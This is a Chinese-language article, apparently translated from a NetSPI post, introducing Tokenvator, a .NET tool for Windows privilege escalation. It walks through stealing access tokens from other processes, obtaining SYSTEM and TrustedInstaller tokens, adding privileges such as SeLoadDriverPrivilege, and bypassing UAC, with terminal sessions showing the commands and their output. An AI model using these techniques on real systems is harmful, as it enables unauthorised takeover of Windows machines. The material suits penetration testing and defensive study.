今天给大家介绍的是一款名叫Tokenvator的工具,该工具采用.NET开发,可用于在Windows系统中提权。
工具下载
下载地址:【GitHub传送门】
基本使用
Tokenvator可以直接在交互式终端中运行,具体的执行命令能够以命令行参数的形式提供。在交互模式下,可以用tab键补全命令,或双击tab键获取帮助信息。
C:\Users\badjuju>Tokenvator.exe
(Tokens)> help
Name Optional Required
---- -------- --------
GetSystem Command -
GetTrustedInstaller Command -
Steal_Token Command ProcessID
BypassUAC ProcessID Command
List_Privileges ProcessID -
Set_Privilege ProcessID Privilege
List_Processes - -
List_Processes_WMI - -
Find_User_Processes - User
Find_User_Processes_WMI - User
List_User_Sessions - -
WhoAmI - -
RevertToSelf - -
Run - Command
(Tokens)> WhoAmI
Name Optional Required
---- -------- --------
WhoAmI - -
(Tokens)> WhoAmI
[*]Operating as LAB\badjuju
下面大部分截图显示的是在交互模式下的命令运行情况:
Steal_Token
从最基本的功能来说,Tokenvator可以用来访问并修改Windows认证令牌,为了获取到特定进程的令牌,我们需要结合目标进程的PID来运行Steal_Token命令。
(Tokens)> Steal_Token
Name Optional Required
---- -------- --------
Steal_Token Command ProcessID
(Tokens)> Steal_Token 7384
[*]Adjusting Token Privilege
[+]Received luid
[*]AdjustTokenPrivilege
[+]Adjusted Token to: SeDebugPrivilege
[*]Impersonating 7384
[+]Recieved Handle for: (7384)
[+]Process Handle: 824
[+]Primary Token Handle: 828
[+]Duplicate Token Handle: 824
(Tokens)> whoami
[*]Operating as lab\backup
或者我们也可以添加额外的命令选项来使用新的访问令牌。
(Tokens)> Steal_Token 7384 powershell.exe
[*]Adjusting Token Privilege
[+]Received luid
[*]AdjustTokenPrivilege
[+]Adjusted Token to: SeDebugPrivilege
[+]Recieved Handle for: (7384)
[+]Process Handle: 860
[+]Primary Token Handle: 864
[+]Duplicate Token Handle: 860
[*]CreateProcessWithTokenW
[+]Created process: 14524
[+]Created thread: 18784
WindowsPowerShell
Copyright(C) Microsoft Corporation. All rights reserved.
PSC:\WINDOWS\system32> whoami
lab\backup
PSC:\WINDOWS\system32> $pid
14524
GetSystem
一般来说,我们经常需要窃取的就是NT AUTHORITY\SYSTEM账号,而GetSystem命令可以帮助我们自动搜索并访问SYSTEM令牌。它的使用语句跟Steal_Token的类似:
(Tokens)> GetSystem
[*]Adjusting Token Privilege
[+]Received luid
[*]AdjustTokenPrivilege
[+]Adjusted Token to: SeDebugPrivilege
[*]Searching for NT AUTHORITY\SYSTEM
[*]Examining 344 processes
[*]Discovered 118 processes
[*]Impersonating 5488
[+]Recieved Handle for: (5488)
[+]Process Handle: 888
[*]Impersonating 4444
[+]Recieved Handle for: (4444)
[+]Process Handle: 868
[+]Primary Token Handle: 904
[+]Duplicate Token Handle: 868
(Tokens)> WhoAmI
[*]Operating as NT AUTHORITY\SYSTEM
(Tokens)> RevertToSelf
[*]Reverted token to lab\badjuju
在某些情况下,如果没有提升到SYSTEM权限的话,我们可能无法直接访问到特定进程的令牌,比如说NT SERVICE账号(本地SQL服务进程)。
GetTrustedInstaller
还有一种常见情况,就是SYSTEM32目录或部分注册表内容属于TRUSTEDINSTALLER组,为了修改这些位置的数据,我们要么拿到数据的拥有权,要么拿到TRUSTEDINSTALLER组成员的访问令牌。跟GetSystem类似,GetTrustedInstaller也是一个Steal_Token的封装其,它可以开启TrustedInstaller服务并获取到相应的令牌。
List_Privileges和Set_Privilege
有的时候,我们的进程不一定拥有所要完成任务必备的权限。比如说,为了访问一个当前用户无法访问的进程,我们就需要SeDebugPrivilege 的帮助了。下面显示的是在一个高度完整的进程中对令牌的切分(UAC Elevated – TokenElevationTypeFull)。
接下来,我们尝试以管理员身份来运行notepad.exe,并查看其访问令牌:
测试完notepad.exe的令牌之后,我们可以尝试增加SeLoadDriverPrivilege来看看会发生什么。注意:权限名称是大小写敏感的。
很明显,notepad.exe可以加载一个驱动器了,而且能做的还有更多,我们之后还会增加权限移除的功能,敬请期待。
UAC绕过
实现UAC绕过的方法有很多种,但最有趣的一种就是修改令牌了。FuzzySecurity在利用Windows令牌实现UAC绕过方面做过很多研究,感兴趣的同学可以查看其GitHub代码库【传送门】,Tokenvator也包含了FuzzySecurity所实现的技术。在下面的测试中,我们位提权的令牌可以用来访问当前用户拥有的特权进程,并生成特权Shell。
这种方法以后很可能也不会被修复,因为这更像是一种功能。
查找用户进程
首先,我们需要查看系统注册的会话信息:
(Tokens)> List_User_Sessions
User SessionID
---- ---------
0
badjuju 1
backup 2
下面是List_Processes命令所实现的东西,即获取用户进程的概览:
(Tokens)> List_Processes
User ProcessID Process Name
---- ---------- ------------
lab\badjuju 4000
List_Processes利用的是主机的原生API,在列举进程和用户方面速度非常快。由于在某些情况下如果没有实现提权的话,某些功能还是无法正常运行的,因此List_Processes_WMI便应运而生。很明显,它的功能是通过WMI实现的,所以它的速度肯定没有List_Processes快,但是它可以在非提权场景下正常运行。
(Tokens)> List_Processes_WMI
[*]Examining 102 processes
User ProcessID Process Name
---- ---------- ------------
\ 0 Idle
LAB\BADJUJU 448 taskhost
LOCAL\0XBADJUJU 1568
我们还可以直接列举出特定用户场景下所有运行的进程信息:
(Tokens)> Find_User_Processes WINDOWS7ENTERPR\BADJUJU
[*]Examining 100 processes
[*]Discovered 29 processes
ProcessID Process Name
---------- ------------
3268 calc
3520 cmd
2604 cmd
4000 conhost
4664 conhost
920 conhost
1972 conhost
4928 conhost
2760 conhost
656 dwm
1776 explorer
5048 msvsmon
5352 msvsmon
3412 notepad
3552 powershell
3116 powershell_ise
2464 rdpclip
4820 rundotnetdll32
3944 taskhost
448 taskhost
3424 Tokenvator
4892 VCSExpress
跟List_Processes机制类似,它也能够在非特权场景下通过WMI完成相同的工作:
(Tokens)> Find_User_Processes_WMI LOCAL\0xBADJUJU
[*]Examining 102 processes
[*]Discovered 31 processes
ProcessID Process Name
---------- ------------
1568 cmd.exe
2108 conhost.exe
1936 procexp64.exe
3544 cmd.exe
3608 conhost.exe
3892 x64dbg.exe
总结
这款工具是我跟NetSPI团队共同开发的,希望能给大家提供帮助,如果大家在使用过程中发现了问题的话,可以在GitHub上留言。
* 参考来源:netspi,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM